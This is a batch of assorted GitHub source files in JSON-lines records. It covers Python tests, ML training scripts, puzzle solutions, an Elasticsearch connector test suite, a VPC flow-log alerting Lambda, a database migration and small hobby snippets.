'is_removed': True,\n })\n\n # Pass this comment to the `comment_post_save()` signal handler\n listing_handlers.comment_post_save(comment)\n\n # Assert that that client.set() was called w/ the appropriate args\n mock_client.set.assert_called_with(\n self._build_publishable_comment_count_key(self.publishable),\n 1\n )\n\n @mock.patch.object(listing_handlers, 'client')\n def test_client_not_invoked(self, mock_client):\n \"\"\"\n Call `comment_post_save()` with a comment that has not been modified,\n and assert that `client.set()` was not invoked.\n \"\"\"\n # Create a new public comment\n comment = self._create_comment()\n\n # Programatically set the `__pub_info` data on the comment (but DON'T CHANGE ANYTHING)\n setattr(comment, '__pub_info', {\n 'is_public': True,\n 'is_removed': False,\n })\n\n # Pass this comment to the `comment_post_save()` signal handler\n listing_handlers.comment_post_save(comment)\n\n # Assert that the `set` method was NOT called\n tools.assert_false(mock_client.set.called)\n","repo_name":"ella/ella-comments","sub_path":"test_ella_comments/test_listing_handlers.py","file_name":"test_listing_handlers.py","file_ext":"py","file_size_in_byte":7689,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"78"} +{"seq_id":"14513326764","text":"from Constant import Gene\n\n\ntarget = [1, 1, 1, 1, 1, 1]\n\n\n# 自交\ndef inbred(size, parent):\n \"\"\"\n 自交\n\n :param size: 种群个数\n :param parent: 亲本 可以是单个植株或者种群\n :return: 子代种群\n \"\"\"\n f_gene = []\n if isinstance(parent, Gene):\n for i in range(size):\n f = Gene()\n for j in range(6):\n xgene = parent.division(j)\n ygene = parent.division(j)\n f.add_gene(xgene, ygene)\n f_gene.append(f)\n\n else:\n for i in range(size):\n f = Gene()\n for j in range(6):\n xgene = parent[i].division(j)\n ygene = parent[i].division(j)\n f.add_gene(xgene, ygene)\n f_gene.append(f)\n return f_gene\n\n\n# 杂交\ndef hybrid(size, mum: Gene, dad: [Gene]):\n f_gene = []\n for i in range(size):\n f = Gene()\n for j in range(6):\n xgene = dad[i].division(j)\n ygene = mum.division(j)\n f.add_gene(xgene, ygene)\n f_gene.append(f)\n return f_gene\n\n\n# 展示\ndef dayin(gene, num=None):\n x = []\n y = []\n if num is None:\n for i in range(6):\n x.append(gene.get_gene(i, 'x'))\n y.append(gene.get_gene(i, 'y'))\n print(x, y)\n else:\n for i in range(6):\n x.append(gene[num].get_gene(i, 'x'))\n y.append(gene[num].get_gene(i, 'y'))\n print(x, y)\n\n\n#\n\n# 找到纯和\ndef find_pure(size, gene):\n \"\"\"\n 找到纯和子\n\n :param size: 种群大小\n :param gene:\n :return: 纯和子的个数\n \"\"\"\n res = 0\n for i in range(size):\n x = []\n y = []\n for j in range(6):\n x.append(gene[i].get_gene(j, 'x'))\n y.append(gene[i].get_gene(j, 'y'))\n if x == target and y == target:\n res += 1\n return res\n","repo_name":"sunoneeye1/CornNavi","sub_path":"1.0/Function.py","file_name":"Function.py","file_ext":"py","file_size_in_byte":1895,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"1479214223","text":"\"\"\"\nscript_name: train_BiGRU_Att.py\n******************************************************\nPurpose: 训练模型\n注:详细信息见:\nDesktop/boohee_projects/base_KG/Information-Extraction-Chinese/RE_BGRU_2ATT/model.ipynb\n******************************************************\nAuthor: xuanhong li\n******************************************************\nDate: 2020-12-8\n******************************************************\nupdate: 2020-12-10 使用自己数据集\n\"\"\"\n\n\nimport tensorflow as tf\nimport numpy as np\nfrom args_help import args\nfrom re_model import arrayToTensor, REModel\n\n\nsave_path = args.checkpoints_path\nwordembedding = np.load('./datasets_RE/vec.npy')\n\ntrain_y = np.load('./datasets_RE/train_y.npy')\nclass_idx = []\nfor m in range(len(train_y)):\n idx = np.argmax(train_y[m], 0)\n class_idx.append(idx)\ntrain_y_array = np.array(class_idx)\n\ntrain_word = np.load('./datasets_RE/train_word.npy', allow_pickle=True)\ntrain_pos1 = np.load('./datasets_RE/train_pos1.npy', allow_pickle=True)\ntrain_pos2 = np.load('./datasets_RE/train_pos2.npy', allow_pickle=True)\n# 将array数据转化为tensor,以下三者的shape=(967, 70)\ntrain_word_a = arrayToTensor(train_word)\ntrain_pos1_a = arrayToTensor(train_pos1)\ntrain_pos2_a = arrayToTensor(train_pos2)\n\ntrain_dataset = tf.data.Dataset.from_tensor_slices((train_word_a, train_pos1_a, train_pos2_a, train_y_array))\ntrain_dataset = train_dataset.shuffle(len(train_word)).batch(args.batch_size, drop_remainder=True)\n\nmodel = REModel(args.batch_size, vocab_size=args.vocab_size, embedding_size=args.embedding_size,\n num_classes=args.num_classes, pos_num=args.pos_num, pos_size=args.pos_size,\n gru_units=args.gru_units, embedding_matrix=wordembedding)\noptimizer = tf.keras.optimizers.Adam(args.lr)\n\ntrain_loss = tf.keras.metrics.Mean(name='train_loss')\ntrain_metric = tf.keras.metrics.SparseCategoricalAccuracy(name='train_accuracy')\n\nckpt = tf.train.Checkpoint(optimizer=optimizer, model=model)\nckpt.restore(tf.train.latest_checkpoint(save_path))\nckpt_manager = tf.train.CheckpointManager(ckpt, save_path, checkpoint_name='model.ckpt', max_to_keep=3)\n\naccuracy = 0\nfor epoch in range(args.epoch):\n for _, (word_batch, pos1_batch, pos2_batch, label_batch) in enumerate(train_dataset):\n train_inputs = [word_batch, pos1_batch, pos2_batch]\n with tf.GradientTape() as tape:\n class_probs = model(train_inputs, training=True)\n logits = tf.stack(class_probs, axis=0) # 所有预测结果的tensor堆叠\n loss = tf.keras.losses.sparse_categorical_crossentropy(y_true=label_batch, y_pred=logits)\n grads = tape.gradient(loss, model.variables)\n optimizer.apply_gradients(grads_and_vars=zip(grads, model.variables))\n\n train_loss.update_state(loss)\n train_metric.update_state(label_batch, logits)\n\n train_accuracy_v, train_loss_v = train_metric.result(), train_loss.result()\n if epoch % 1 == 0:\n print('第' + str(epoch) + '轮训练结果为:')\n print(\"train accuracy: %f\" % train_accuracy_v)\n print(\"train loss: %f\" % train_loss_v)\n print('-' * 50)\n if train_accuracy_v > accuracy:\n accuracy = train_accuracy_v\n ckpt_manager.save()\n\n train_loss.reset_states()\n train_metric.reset_states()","repo_name":"lixuanhng/NLP_related_projects","sub_path":"RE/train_BiGRU_Att.py","file_name":"train_BiGRU_Att.py","file_ext":"py","file_size_in_byte":3318,"program_lang":"python","lang":"en","doc_type":"code","stars":114,"dataset":"github-code","pt":"78"} +{"seq_id":"41806133947","text":"# Quality of life imports\nfrom pathlib import Path\nfrom sys import modules\nfrom functools import reduce\n\nimport math\nimport re\n\nimport itertools as it\nimport numpy as np\n\n\n# Quality of life, define the input file location\nsrc = Path(modules['__main__'].__file__).resolve().parent\ninput_file_path = Path(src, \"input.txt\")\n\nSIZE_CAP = 100\nKNOWN_OVERLAPS = {\n\n}\n\ndef convert_range(input_range: str) -> list:\n spl = [list(map(int, x.split('..'))) for x in input_range]\n return spl\n\ndef convert_abs_range(input_range: list) -> int:\n return abs(input_range[0] - input_range[1])\n \ndef calculate_change(input_coords: list) -> int:\n return reduce(lambda x, y : x * y, input_coords)\n\n# Unpack input into something we can use\ninput_lines = []\nwith open(input_file_path) as f:\n lines = [x.rstrip() for x in f.readlines()]\n for x in lines:\n try:\n\n # Yes we're unpacking all the ranges right now, in part 2 I know I will need them so wtv I can discard them now\n x_range, y_range, z_range = re.findall(r\"-?\\d+..-?\\d+\", x)\n state = re.findall(r\"(on|off)\", x)\n ranges = convert_range([x_range, y_range, z_range])\n if all(abs(i) <= SIZE_CAP for i in np.array(ranges).flatten()):\n input_lines.append([state[0], *ranges])\n\n except ValueError as e:\n print(e)\n\n\n# Basically the idea is to use axis aligned 3d \"bounding\" boxes\n# If all 3 ranges are over lapping then there is a collision\ndef check_overlap(current_range, current_idx, prev_elems):\n def are_overlapping(current, suspected):\n return current[1] >= suspected[0] and suspected[1] >= current[0]\n\n def intersect_vol(current, suspected):\n def axis_overlap(A, B):\n return max(0, min(A[1], B[1]) - max(A[0], B[0])) \n return axis_overlap(current[0], suspected[0]) * \\\n axis_overlap(current[1], suspected[1]) * \\\n axis_overlap(current[2], suspected[2])\n\n # We need to check if the state is similar as well\n \n # What if the same region is overlapping\n\n # If two on segments are overlapping we need by how much they are overlapping, subtract that from the\n # New amount we're adding to the total\n \n # If two off sections are overlapping we just need\n\n for idx, elem in prev_elems[::-1]:\n for axis in current_range:\n if are_overlapping(axis, elem):\n # Avoid deep nesting\n continue\n\n # Add it to the list of known overlaps \n if current_idx not in KNOWN_OVERLAPS:\n KNOWN_OVERLAPS[current_idx] = [idx]\n else:\n KNOWN_OVERLAPS[current_idx].append(idx)\n \n\n# Skip copying elements into a new thing and use itertools C to do things faster as an iter\ndef skip_element(all_elements, idx):\n return it.chain(it.islice(all_elements, 0, idx), it.islice(all_elements, idx+1, None))\n\n\ndef get_previous(all_elements, idx):\n return it.chain(it.islice(all_elements, 0, idx))\n\nANY_OFF = False\nTOTAL_ON = 0\n\nfor idx, line in enumerate(input_lines):\n state, x_range, y_range, z_range = line\n x_size = convert_abs_range(x_range)\n y_size = convert_abs_range(y_range)\n z_size = convert_abs_range(z_range)\n\n total_size = calculate_change([x_size, y_size, z_size])\n\n if state == 'off':\n ANY_OFF = True\n\n if not ANY_OFF and state != 'off':\n TOTAL_ON += total_size\n\n if ANY_OFF:\n previous_elem_iter = get_previous(input_lines, idx)\n overlap = check_overlap(line, previous_elem_iter)\n\n # if state == 'off':\n # TOTAL_ON -= overlap\n # else:\n # TOTAL_ON += overlap\n\nprint()\n","repo_name":"Vi-Robitaille/src-advent-of-code","sub_path":"src/python/2021/22/part1.py","file_name":"part1.py","file_ext":"py","file_size_in_byte":3674,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"10575527225","text":"import numpy as np\nimport tensorflow as tf\nimport os\nfrom tqdm import tqdm\nimport functools\nfrom SpeechDataUtils import SpeechDataUtils\nfrom SpeechDataUtils import SpeechDataSet\nfrom CLDNNConfig import CLDNNConfig\n\ndef define_scope(function):\n attribute = '_cache_' + function.__name__\n\n @property\n @functools.wraps(function)\n def decorator(self):\n if not hasattr(self, attribute):\n with tf.variable_scope(function.__name__):\n setattr(self, attribute, function(self))\n return getattr(self, attribute)\n\n return decorator\n\nclass CLDNNModel:\n def __init__(self, config : CLDNNConfig):\n self.config = config\n\n self.init_placeholders()\n \n self.input_size = int(self.config.max_timesteps)\n self.output_size = int(self.config.max_output_length)\n\n print(\"Inference : \", self.inference)\n print(\"Loss : \", self.loss)\n print(\"Training : \", self.training)\n print(\"Evaluation : \", self.evaluation)\n\n def init_placeholders(self):\n self.input_placeholder = tf.placeholder(tf.float32, [None, self.config.max_timesteps, self.config.mfcc_features_count], name=\"input__placeholder\")\n self.input_lengths_placeholder = tf.placeholder(tf.int32, [None], name=\"input_lengths_placeholder\")\n\n self.sparse_output_placeholder = tf.sparse_placeholder(tf.int32, name=\"sparse_true_output_placeholder\")\n self.output_placeholder = tf.placeholder(tf.int32, shape=[None, self.config.max_output_length, self.config.dictionary_size], name=\"true_output_placeholder\")\n self.output_lengths_placeholder = tf.placeholder(tf.int32, [None], name=\"output_lengths_placeholder\")\n\n self.learning_rate_placeholder = tf.placeholder(tf.float32, [], name=\"learning_rate\")\n\n @define_scope\n def inference(self):\n input_as_2d_tensor = tf.reshape(self.input_placeholder, [-1, self.config.max_timesteps, self.config.mfcc_features_count, 1])\n\n # 1st Layer (Convolution)\n ## Weights & Bias\n with tf.name_scope(\"Convolution\"):\n weights_conv_layer = CLDNNModel.weight_variable([self.config.conv_kernel_size, self.config.conv_kernel_size, 1, self.config.conv_features_count])\n bias_conv_layer = CLDNNModel.bias_variable([self.config.conv_features_count])\n ## Result\n conv_layer = CLDNNModel.conv2d(input_as_2d_tensor, weights_conv_layer) + bias_conv_layer\n relu_conv_layer = tf.nn.relu(conv_layer)\n\n # 2nd Layer (Max Pooling)\n with tf.name_scope(\"Max_pooling\"):\n max_pool_layer = CLDNNModel.max_pool_1xN(relu_conv_layer, self.config.max_pooling_size)\n\n # 3rd Layer (Dimension reduction)\n ## Flattening (from 2D to 1D)\n with tf.name_scope(\"Dim_reduction\"):\n convoluted_size = int(self.config.max_timesteps) * int(self.config.mfcc_features_count / self.config.max_pooling_size)\n flatten_size = convoluted_size * self.config.conv_features_count\n #flatten_size = int(convoluted_size * self.conv_features_count / self.config.max_timesteps)\n max_pool_layer_flatten = tf.reshape(max_pool_layer, [-1, flatten_size], name=\"Flatten_maxpool\")\n ## Weights and Bias\n time_red_size = int(self.config.max_timesteps / self.config.time_reduction_factor)\n dim_red_size = time_red_size * self.config.dimension_reduction_output_size\n weights_dim_red_layer = CLDNNModel.weight_variable([flatten_size, dim_red_size])\n bias_dim_red_layer = CLDNNModel.bias_variable([dim_red_size])\n ## Result\n dim_red_layer = tf.matmul(max_pool_layer_flatten, weights_dim_red_layer) + bias_dim_red_layer\n\n # Input reduction (for memory issues :( )\n with tf.name_scope(\"Input_reduction\"):\n flatten_input_size = self.config.max_timesteps * self.config.mfcc_features_count\n flatten_input_size_red = int(flatten_input_size / self.config.time_reduction_factor)\n flatten_input = tf.reshape(self.input_placeholder, [-1, flatten_input_size], name=\"flatten_input\")\n \n weights = CLDNNModel.weight_variable([flatten_input_size, flatten_input_size_red])\n biaises = CLDNNModel.bias_variable([flatten_input_size_red])\n\n red_input = tf.matmul(flatten_input, weights) + biaises\n red_time = tf.cast(tf.ceil(self.input_lengths_placeholder / self.config.time_reduction_factor), tf.int32)\n\n # 4th Layer (Concatenation)\n with tf.name_scope(\"Concatenation\"):\n concatenation_layer = tf.concat(1, [dim_red_layer, red_input])\n concatenation_layer_reshaped = tf.reshape(concatenation_layer, (-1, time_red_size, self.config.dimension_reduction_output_size + self.config.mfcc_features_count), name=\"reshape_timesteps_concat\")\n\n # 5th Layer (LSTM 1)\n with tf.name_scope(\"LSTM1\"):\n with tf.variable_scope(\"LSTMCell1\"):\n lstm_cell = tf.nn.rnn_cell.LSTMCell(self.config.lstm1_hidden_units_count)\n lstm1_output, lstm_state = tf.nn.dynamic_rnn(lstm_cell, concatenation_layer_reshaped, dtype=tf.float32, sequence_length = red_time)\n\n # 6th Layer (LSTM 2)\n with tf.name_scope(\"LSTM2\"):\n with tf.variable_scope(\"LSTMCell2\"):\n lstm_cell = tf.nn.rnn_cell.LSTMCell(self.config.lstm2_hidden_units_count)\n lstm2_output, lstm_state = tf.nn.dynamic_rnn(lstm_cell, lstm1_output, dtype=tf.float32)\n\n lstm2_output_shape = lstm2_output.get_shape()\n lstm2_output_shape = [-1, int(lstm2_output_shape[1] * lstm2_output_shape[2])]\n lstm2_output_reshaped = tf.reshape(lstm2_output, lstm2_output_shape)\n\n # 7th Layer (Fully connected 1)\n with tf.name_scope(\"Fully_connected1\"):\n weights = CLDNNModel.weight_variable([lstm2_output_shape[1], self.config.fully_connected1_size])\n biases = CLDNNModel.bias_variable([self.config.fully_connected1_size])\n\n fully_connected_layer1 = tf.matmul(lstm2_output_reshaped, weights) + biases\n\n # 7th Layer (Fully connected 2)\n with tf.name_scope(\"Fully_connected2\"):\n weights = CLDNNModel.weight_variable([self.config.fully_connected1_size, self.output_size * self.config.dictionary_size])\n biases = CLDNNModel.bias_variable([self.output_size * self.config.dictionary_size])\n\n fully_connected_layer2 = tf.matmul(fully_connected_layer1, weights) + biases\n\n logits = tf.reshape(fully_connected_layer2, [-1, self.output_size , self.config.dictionary_size])\n \n return logits # Should be the 7th layer's ouput\n\n @define_scope\n def loss(self):\n if self.config.use_ctc_loss:\n inference_time_major = tf.transpose(self.inference, [1, 0, 2])\n ctc = tf.nn.ctc_loss(inference_time_major, self.sparse_output_placeholder, self.output_lengths_placeholder, time_major = True, ctc_merge_repeated=False)\n return tf.reduce_mean(ctc)\n else:\n cross_entropy = tf.nn.softmax_cross_entropy_with_logits(self.inference, self.output_placeholder)\n return tf.reduce_mean(cross_entropy)\n\n @define_scope\n def training(self):\n tf.summary.scalar('loss', self.loss)\n\n #optimizer = tf.train.GradientDescentOptimizer(self.config.learning_rate)\n optimizer = tf.train.MomentumOptimizer(self.learning_rate_placeholder, 0.9)\n\n global_step = tf.Variable(0, name='global_step', trainable=False)\n\n train_op = optimizer.minimize(self.loss, global_step = global_step)\n\n return train_op\n \n @define_scope\n def evaluation(self):\n correct_prediction = tf.equal(tf.argmax(self.inference, 2), tf.argmax(self.output_placeholder, 2))\n return tf.cast(correct_prediction, tf.float32)\n \n @staticmethod\n def conv2d(inputTensor, weights):\n return tf.nn.conv2d(inputTensor, weights, strides=[1, 1, 1, 1], padding='SAME')\n\n @staticmethod\n def max_pool_1xN(inputTensor, max_pooling_size):\n return tf.nn.max_pool(inputTensor, ksize=[1, 1, max_pooling_size, 1], strides=[1, 1, max_pooling_size, 1], padding='SAME')\n\n @staticmethod\n def init_variable(shape, init_method='uniform', xavier_params = (None, None)):\n if init_method == 'zeros':\n return tf.Variable(tf.zeros(shape, dtype=tf.float32))\n elif init_method == 'uniform':\n return tf.Variable(tf.random_normal(shape, stddev=0.01, dtype=tf.float32))\n else: #xavier\n (fan_in, fan_out) = xavier_params\n low = -4*np.sqrt(6.0/(fan_in + fan_out)) # {sigmoid:4, tanh:1} \n high = 4*np.sqrt(6.0/(fan_in + fan_out))\n return tf.Variable(tf.random_uniform(shape, minval=low, maxval=high, dtype=tf.float32))\n # Need for gaussian (for LSTM)\n\n @staticmethod\n def weight_variable(shape, init_method='uniform', xavier_params = (None, None)):\n return CLDNNModel.init_variable(shape, init_method, xavier_params)\n\n @staticmethod\n def bias_variable(shape, init_method='uniform', xavier_params = (None, None)):\n return CLDNNModel.init_variable(shape, init_method, xavier_params)","repo_name":"Zelgunn/Immersive-AI","sub_path":"CLDNN/CLDNN/CLDNNModel.py","file_name":"CLDNNModel.py","file_ext":"py","file_size_in_byte":8619,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"17706582729","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom base import Problem\n\n\nclass Solution(Problem):\n\n def solve(self, input_):\n a = 1\n b = 1\n count = 2\n while len(str(b)) < input_:\n a, b = b, a + b\n count += 1\n\n print('Solve problem {}'.format(self.number))\n print(count)\n\n\nif __name__ == '__main__':\n solution = Solution(25)\n solution.solve(1000)\n","repo_name":"phapdv/project_euler","sub_path":"pe25.py","file_name":"pe25.py","file_ext":"py","file_size_in_byte":421,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"74440761532","text":"import unittest\nfrom unittest.mock import Mock, patch\nfrom connector import Connector\nimport connector\n\n\nclass TestApp(unittest.TestCase):\n\n def setUp(self):\n with patch('connector.create_engine') as mocked_engine:\n with patch('connector.MetaData') as mocked_metadata:\n with patch('connector.Table') as mocked_table:\n mocked_table.return_value.columns = [\n \"Table\", 'name', 'somethingelse']\n self.inst = Connector(\n 'somedb', 'sometable', 'someesindex', 'somedb_type')\n\n def test_connector_instance_creation(self):\n self.assertEqual(self.inst.elastic_index, 'someesindex')\n self.assertEqual(self.inst.elastic_doc_type, 'somedb_type')\n\n def test_connector_instance_creation_with_wrong_table_name_negative(self):\n with patch('connector.create_engine') as mocked_engine:\n with patch('connector.MetaData') as mocked_metadata:\n with patch('connector.Table') as mocked_table:\n with self.assertRaises(TypeError) as raised_exception:\n inst = Connector(\n 'somedb', 3, 'someesindex', 'somedb_type')\n self.assertEqual(raised_exception.exception.args[0],\n 'table must be str')\n\n def test_connector_instance_creation_with_wrong_database_name_negative(\n self):\n with patch('connector.create_engine') as mocked_engine:\n with patch('connector.MetaData') as mocked_metadata:\n with patch('connector.Table') as mocked_table:\n with self.assertRaises(TypeError) as raised_exception:\n inst = Connector(\n (1, 2, 3), 'sad', 'someesindex', 'somedb_type')\n self.assertEqual(raised_exception.exception.args[0],\n 'database must be str')\n\n def test_connector_instance_creation_with_wrong_elastic_index_negative(\n self):\n with patch('connector.create_engine') as mocked_engine:\n with patch('connector.MetaData') as mocked_metadata:\n with patch('connector.Table') as mocked_table:\n with self.assertRaises(TypeError) as raised_exception:\n inst = Connector('dsa', 'sad', 523, 'somedb_type')\n self.assertEqual(raised_exception.exception.args[0],\n 'elastic_index must be str')\n\n def test_connector_instance_creation_with_wrong_elastic_doc_type_negative(\n self):\n with patch('connector.create_engine') as mocked_engine:\n with patch('connector.MetaData') as mocked_metadata:\n with patch('connector.Table') as mocked_table:\n with self.assertRaises(TypeError) as raised_exception:\n inst = Connector(\"sad\", 'sad', 'someesindex', 0000)\n self.assertEqual(raised_exception.exception.args[0],\n 'elastic_doc_type must be str')\n\n def test_connector_instance_creation_without_connection_to_database_wrong(\n self):\n with self.assertRaises(connector.DatabaseConnectionError) as raised_exception:\n inst = Connector(\"sad\", 'sad', 'someesindex', 'sda')\n self.assertEqual(\n raised_exception.exception.args[0],\n 'Connection to databes has failed')\n\n def test_connector_headers_property(self):\n self.assertEqual(self.inst.headers, (\"Table\", 'name', 'somethingelse'))\n\n def test_get_json_from_row(self):\n head = Mock()\n head.name = 'sad'\n with patch('connector.create_engine') as mocked_engine:\n with patch('connector.MetaData') as mocked_metadata:\n with patch('connector.Table') as mocked_table:\n mocked_table.return_value.columns = [head]\n inst = Connector(\"sad\", 'sad', 'someesindex', 'sda')\n self.assertEqual(inst.get_json_from_row(['Table']), {'sad': 'Table', })\n\n def test_delete_index(self):\n with patch('connector.Connector.es.indices.delete') as mock_es:\n mock_es.return_value.indices.delete = 'sa'\n self.assertEqual(None, self.inst.delete_index())\n\n def test_delete_index_negative(self):\n mock = Mock(side_effect=connector.ElasticConnectionError)\n with self.assertRaises(connector.ElasticConnectionError) as raise_exception:\n with patch('connector.Connector.es') as mock_es:\n mock_es.return_value.indices.delete = mock()\n self.inst.delete_index()\n\n def test_primary_key(self):\n with patch('connector.create_engine') as mocked_engine:\n with patch('connector.MetaData') as mocked_metadata:\n with patch('connector.Table') as mocked_table:\n mocked_table.return_value.primary_key.columns.values()[\n 0].name = 'id'\n inst = Connector(\n 'somedb', 'sometable', 'someesindex', 'somedb_type')\n self.assertEqual(inst.primary_key, 'id')\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"cdeler/woogle","sub_path":"wiki_indexer/test_app.py","file_name":"test_app.py","file_ext":"py","file_size_in_byte":5182,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"1856451682","text":"# -*- coding: utf-8 -*-\nimport os\nimport time\nimport socket\nimport urllib.parse\nimport urllib.request\nimport urllib.error\nimport csv\nimport gzip\nimport ipaddress\nimport json\nimport logging\nimport boto3\n\nlogger = logging.getLogger()\nlogger.setLevel(logging.WARNING)\n\ns3 = boto3.client('s3')\nssm = boto3.client('ssm')\nlogs = boto3.client('logs')\n\n# environment variable\nLOGS_GROUP_NAME = os.environ['LOGS_GROUP_NAME']\nLOGS_STREAM_NAME = os.environ['LOGS_STREAM_NAME']\n\n# local cidr\n# VPC_CIDR = [\n# '10.0.0.0/8',\n# '172.16.0.0/12',\n# '192.168.0.0/16',\n# '198.19.0.0/16']\nVPC_CIDR = [\n '10.254.240.0/24',\n '10.254.241.0/26',\n '10.254.242.0/26']\n\nAWS_IP_RANGE_URL = 'https://ip-ranges.amazonaws.com/ip-ranges.json'\n\n\n# ----------------------------------------------------------------------\n# AWS IP Range\n# ----------------------------------------------------------------------\ndef get_aws_cidr():\n try:\n with urllib.request.urlopen(AWS_IP_RANGE_URL) as res:\n body = res.read().decode('utf-8')\n cidr = json.loads(body)\n return cidr\n except urllib.error.URLError as e:\n logger.info('Error: get_aws_ip_ranges() {}'.format(str(e)))\n return {}\n\n\ndef extract_aws_ip_range(cidr):\n regions = ['ap-northeast-1', 'us-east-1']\n cidr_list = [_range.get('ip_prefix') for _range in cidr.get('prefixes')\n if _range.get('region') in regions]\n return cidr_list\n\n\ncidr = get_aws_cidr()\nAWS_CIDR = set(extract_aws_ip_range(cidr))\nAWS_CIDR = sorted(AWS_CIDR)\n\n\ndef in_white_list_cidr():\n response = ssm.get_parameter(Name='whitelist_cidr_v1')\n white_list = response.get('Parameter').get('Value').split(',')\n return white_list\n\nWHITE_LIST_CIDR = in_white_list_cidr()\n\n\ndef reverse_lookup(ip):\n try:\n return socket.gethostbyaddr(ip)[0]\n except socket.herror as e:\n # logger.error(e)\n logger.info('illegal.domain: gethostbyaddr() {}'.format(str(e)))\n return 'illegal.domain'\n\n\ndef in_local_cidr(ip_addr):\n\n cidr_list = VPC_CIDR + AWS_CIDR + WHITE_LIST_CIDR\n try:\n ip = ipaddress.ip_address(ip_addr)\n except ValueError:\n # for example. ipaddr: '-'\n return True\n\n for cidr in cidr_list:\n nw = ipaddress.ip_network(cidr)\n if ip in nw:\n logger.info('ip: {} in local cidr: {}'.format(ip_addr, cidr))\n return True\n else:\n logger.info('ip: {} not in local cidr: {}'.format(ip_addr, cidr))\n continue\n\n return False\n\n\ndef in_white_list_domain(domain):\n response = ssm.get_parameter(Name='whitelist_for_external_domain_v1')\n white_list = response.get('Parameter').get('Value').split(',')\n logger.info('whitelist: {}'.format(white_list))\n logger.info('whitelist type: {}'.format(type(white_list)))\n\n for white in white_list:\n if domain.endswith(white):\n return True\n else:\n continue\n return False\n\n\ndef put_log_events(message):\n\n # events format\n events = [\n dict([('timestamp', int(time.time())*1000), ('message', message)])\n ]\n\n response = logs.describe_log_streams(\n logGroupName=LOGS_GROUP_NAME,\n logStreamNamePrefix=LOGS_STREAM_NAME)\n\n logger.info('describe_log_streams: {}'.format(response))\n\n stream = response['logStreams'][0]\n sequence_token = stream.get('uploadSequenceToken')\n\n if sequence_token:\n logs.put_log_events(\n logGroupName=LOGS_GROUP_NAME,\n logStreamName=LOGS_STREAM_NAME,\n logEvents=events,\n sequenceToken=sequence_token\n )\n else:\n logs.put_log_events(\n logGroupName=LOGS_GROUP_NAME,\n logStreamName=LOGS_STREAM_NAME,\n logEvents=events\n )\n logger.info('logs.put_log_event: {}'.format(events))\n\n\ndef message_format(messages):\n # '@@' is a message separator for message text.\n # This separator process is executed by this function.\n # ./alarm_lambda/lambda_function()\n return '@@'.join(messages)\n\n\ndef check_domain(dest, line):\n\n domain = reverse_lookup(dest)\n logger.info('domain: {}'.format(domain))\n\n if in_white_list_domain(domain):\n logger.info('no problem domain: {} <- ip: {}'.format(domain, dest))\n else:\n # alarm\n logger.warning('Alarm domain: {} <- ip: {}'.format(domain, dest))\n message = 'Alarm domain: {}, ip-address: {}'.format(domain, dest)\n log_line = json.dumps(line)\n _message = message_format([message, log_line])\n put_log_events(_message)\n\n\ndef vpc_flow_log_object(event):\n bucket = event['Records'][0]['s3']['bucket']['name']\n key = urllib.parse.unquote_plus(\n event['Records'][0]['s3']['object']['key'], encoding='utf-8')\n logger.info('key: {}'.format(key))\n return bucket, key\n\n\ndef lambda_handler(event, context):\n logger.info('event: {}'.format(event))\n\n bucket, key = vpc_flow_log_object(event)\n try:\n s3.download_file(bucket, key, '/tmp/file.csv.gz')\n\n with gzip.open('/tmp/file.csv.gz', 'rt') as csv_file:\n f = csv.DictReader(csv_file, delimiter=' ')\n for line in f:\n dest = line.get('dstaddr')\n logger.info('dest ip: {}'.format(dest))\n\n if not in_local_cidr(dest):\n check_domain(dest, line)\n\n except Exception as e:\n logger.error(e)\n raise e\n","repo_name":"rafty/NotifyUnexpectedAddress","sub_path":"lambda/lambda_function.py","file_name":"lambda_function.py","file_ext":"py","file_size_in_byte":5435,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"36836977719","text":"\"\"\"empty message\n\nRevision ID: 44e142d6ce2a\nRevises: \nCreate Date: 2019-01-05 17:42:54.956500\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\nfrom sqlalchemy.dialects import postgresql\n\n# revision identifiers, used by Alembic.\nrevision = '44e142d6ce2a'\ndown_revision = None\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('order',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('status', sa.String(), nullable=True),\n sa.Column('total', sa.Integer(), nullable=True),\n sa.Column('items', postgresql.JSON(astext_type=sa.Text()), nullable=True),\n sa.PrimaryKeyConstraint('id')\n )\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_table('order')\n # ### end Alembic commands ###\n","repo_name":"william-ek/Python-Order-Server","sub_path":"migrations/versions/44e142d6ce2a_.py","file_name":"44e142d6ce2a_.py","file_ext":"py","file_size_in_byte":887,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"25781403270","text":"#GENERATORS ARE ITERATORS............\n\n#memory ---------- [---------------] ......list [save in memory]\n#memory ---------- [----].......generators[at a time one] memory space reduce and perforamnce is better\n# import time\n# t1 =time.time()\n# def nums(n):\n# for i in range(1,n+1):\n# yield i\n# temp = nums(10)\n# for i in temp:\n# print(i)\n# t2 =time.time()\n# print((t2-t1))\n\ndef even_no(n):\n for i in range(2,n+1,2):\n yield i\n \ntemp_e=even_no(5)\nfor i in temp_e: # if i write for i in even_no(4): then two time loop execute....\n print(i)\n\n\n ","repo_name":"Umang070/Python_Programs","sub_path":"generators.py","file_name":"generators.py","file_ext":"py","file_size_in_byte":580,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"16015051614","text":"import Jetson.GPIO as GPIO\nimport time\n\nfrom PyQt5.QtCore import *\n\nGPIO.setwarnings(False)\nGPIO.setmode(GPIO.BCM) \n\nGPIO.setup(4, GPIO.OUT) # Set GPIO pin 19 to output mode.\nGPIO.output(4, 